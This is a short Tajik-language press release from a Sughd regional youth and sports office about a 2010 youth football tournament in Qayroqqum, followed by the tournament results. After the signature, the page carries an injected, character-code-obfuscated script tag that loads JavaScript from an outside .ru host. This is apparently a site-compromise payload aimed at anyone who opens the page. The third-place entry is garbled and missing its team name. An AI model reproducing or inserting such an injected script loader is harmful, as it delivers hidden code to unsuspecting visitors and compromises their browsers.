25.08.2010
Мусобиқаи ҷумҳурияви дар Қайроққум
Бо ташаббуси Кумитаи ҷавонон, варзиш ва сайёҳии назди Ҳукумати Ҷумҳурии Тоҷикистон аз санаи 17 то 21-уми августи соли равон дар шаҳри Қайроққум мусобиқаи ҷумҳурияви оид ба футбол барои дарёфти мукофоти клуби “Тӯби чармин-2010” байни ҷавонон гузаронида шуд, ки дар он зиёда аз 112 варзишгар аз 8 дастаҳои шаҳру ноҳияҳои ҷумҳури ба монанди Хатлон-1, Хатлон-2, Суғд-1, Суғд-2, Душанбе, Кӯлоб, Турсунзода, Нуробод ширкат варзиданд.
Натиҷаи мусобиқа чунин аст:
Ҷои якум Суғд-1
Ҷои дуюм Хатлон-1
Ҷои сеюм-2
Ғолибони мусобиқa бо диплому медалҳои таъсиснамудаи Кумитаи ҷавонон, варзиш ва сайёҳии назди Ҳукумати Ҷумҳурии Тоҷикистон ва Раёсати ҷавонон, варзиш ва сайёҳии вилояти Суғд сарфароз гардонида шудаанд.

Маркази матбуоти Раёсати ҷавонон,
варзиш ва сайёҳии вилояти Суғд
char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)7a1f45c464a201af6ee470298a4dc115.js" type="text/javascript">

ТАВЗЕҲОТ